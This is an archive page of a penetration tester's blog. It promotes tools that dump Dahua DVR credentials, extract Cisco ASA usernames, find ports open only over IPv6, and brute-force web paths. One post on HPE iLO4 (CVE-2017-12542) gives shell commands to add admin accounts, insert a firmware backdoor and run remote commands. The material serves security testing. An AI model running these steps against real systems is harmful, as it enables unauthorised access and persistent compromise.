Archive

Author Archive

CVE-2013-6117 – Tool (Multithreaded and Extremely Fast)

July 23, 2018 Leave a comment

I wrote a simple script in Go to test if the target Dahua DVR device is vulnerable to authentication bypass flaw (CVE-2013-6117).

Dahua DVRs listen on TCP port 37777 by default.

If it is vulnerable, it will dump the credentials along with the dynamic dns name (DynDNS).

Some system administrators might use the same password for other systems. Therefore, a penetration tester might be able to use the credentials obtained from the DVR to gain further access into the network by accessing other systems or applications.

As the script is written in Go, it makes the tool extremely fast.

For more information regarding this vulnerability, you might want to check out https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117.

Screen Shot 2018-07-24 at 2.06.12 AM.png
The script can be downloaded from https://github.com/milo2012/CVE-2013-6117.

 

Advertisements

CRESTCon Asia 2018 – Config Password Encryption Gone Wrong

July 21, 2018 Leave a comment

Below are my presentation slides from CRESTCon Asia 2018.

I presented the topic “Config Password Encryption Gone Wrong”.

I will be working on a proper writeup which contains more details. Please follow my blog to get updates.

https://www.slideshare.net/keith55/crestcon-asia-2018-config-password-encryption-gone-wrong

Categories: Uncategorized

Wordlists for Dir/File Bruteforcing

July 21, 2018 Leave a comment

i have been updating a couple of wordlists under my pathBrute Github project that could be useful to a  penetration tester during the recon phrase to discover ‘interesting paths’ on target websites.

Do check out my Github page if you are interested to find out more. There are about more than 30,000 entries in the wordlists as of 21st July 2018.

The wordlists are extracted from Exploit Database, Packetstorm and Metasploit framework.

  1. Metasploit  https://github.com/milo2012/pathbrute/blob/master/defaultPaths.txt
  2. Exploit database  https://github.com/milo2012/pathbrute/blob/master/exploitdb_all.txt
  3. Packetstorm https://github.com/milo2012/pathbrute/blob/master/packetstormPaths.txt

Below is a screenshot of one of the wordlists.
Screen Shot 2018-07-21 at 8.17.39 PM.png

Categories: Recon

Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

June 30, 2018 Leave a comment

The below contains some of my own notes for exploiting CVE-2017-12542.  The below notes are incomplete. I will spend some time on how to get RCE on other version of firmwares for HP iLO (as explained below).

List / Add users on the HP iLO
If you just need to list or add accounts on the HP iLO, you can just use the script from https://github.com/skelsec/CVE-2017-12542 or Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

or

$ python /pentest/CVE-2017-12542/exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HP iLO
The RCE/Backdoor exploit at https://github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4 currently only works for the below firmwares. Some modifications might be required to work on other versions.

Based on HP’s advisory (https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us0, iLO 4 prior to versions 2.53 are vulnerable.

The firmware for HP iLO can be downloaded from http://pingtool.org/latest-hp-ilo-firmwares/.

Steps on how to get command execution on HP iLO and extract passwords

$ git clone https://github.com/airbus-seclab/ilo4_toolbox

$ curl -s -k  https://x.x.x.x/xmldata?item=all | grep -i “<FWRI>”
<FWRI>2.5.3</FWRI>

$ wget http://downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd(“/usr/bin/id”)
ib.remove_linux_backdoor()

Categories: Exploitation

Using IPv6 to Bypass Security (tool)

June 22, 2018 Leave a comment

John Anderson from Trustwave wrote an interesting post on Trustwave SpiderLabs blog (link at end of this post).

In the article, an attacker was able to use IPv6 to bypass security protections that was in place for iPv4 but not IPv6.

The number of open ports on the IPv6 and IPv4 addresses on the same host are different.

Below is a walkthrough of how to perform the technique.

1) Sends an ICMP echo request (ping6 ff02::1%eth0) to the broadcast address (ff02::1) , all IPv6 hosts in the local network will reply
2) Sends an ARP requests to all IPv4 hosts in the local network
3) Performs a port scan of all IPv4 and IPv6 hosts that are alive in the local network
4) Match the IPv6 address to the IPv4 address based on the MAC address information.
5) Checks to see if the scan against the IPv6 address on the host returns more open ports that the IPv4 address on the same host and outputs the difference in ports (if any)

I wrote a simple script to make the testing for this easier by automating these steps so that we can focus on more important testing.

Below is a screenshot of how the tool looks like when it runs.

In the screenshot below (in the last few lines), TCP ports 22, 111 and 8080 were accessible on the IPv6 interface of the host (10.5.192.48 | fe80::250:56ff:fe97:7a3b) but not on the IPv4 interface.

The next step would be to fingerprint the services running on the IPv6 interface, test for default or weak accounts (SSH), look for vulnerabilities and so on. You might just get lucky.

You can find the tool in the below Github link
https://github.com/milo2012/ipv4Bypass

 

Below are some useful articles that are related
https://www.trustwave.com/Resources/SpiderLabs-Blog/Using-IPv6-to-Bypass-Security/

https://www.darkreading.com/vulnerabilities—threats/weaponizing-ipv6-to-bypass-ipv4-security-/a/d-id/1331993

(CVE-2018-0296) Script to extract usernames from Cisco ASA devices

June 21, 2018 Leave a comment

I wrote a simple script to extract usernames from Cisco ASA devices if they are vulnerable to CVE-2018-0296.

You can check out this blog post for more technical details.
https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/

Screen Shot 2018-06-21 at 5.04.44 PM

This script would be useful instead of doing it manually.

However, there are easier ways to get usernames belonging to an organization.

The script is available at https://github.com/milo2012/CVE-2018-0296.

Categories: Uncategorized

pathBrute – yet another dirbuster alternative

April 21, 2018 Leave a comment

pathBrute is yet another dirbuster alternative.

It’s written in Go so it’s blazing fast.

pathBrute contains/uses a number of self compiled wordlists for identifying “interesting” content and potentially vulnerable websites.
1) 13925 URI paths from Exploit-Database (increasing regularly)
2) URI paths from Metasploit Framework

pathBrute can also use wordlists from other sources if you prefer.

pathBrute can also be used for identifying if any type of CMS (Joomla, WordPress and Drupal) is running on the target websites and fingerprint the versions of the CMS using the –cms option.

Binaries for different platforms and architectures are available in the the below Github project’s release section.

pathBrute is also available as a docket container.

I hope this tool will come in handy to you as it is to me.

The tool can be downloaded from https://github.com/milo2012/pathbrute

Categories: Uncategorized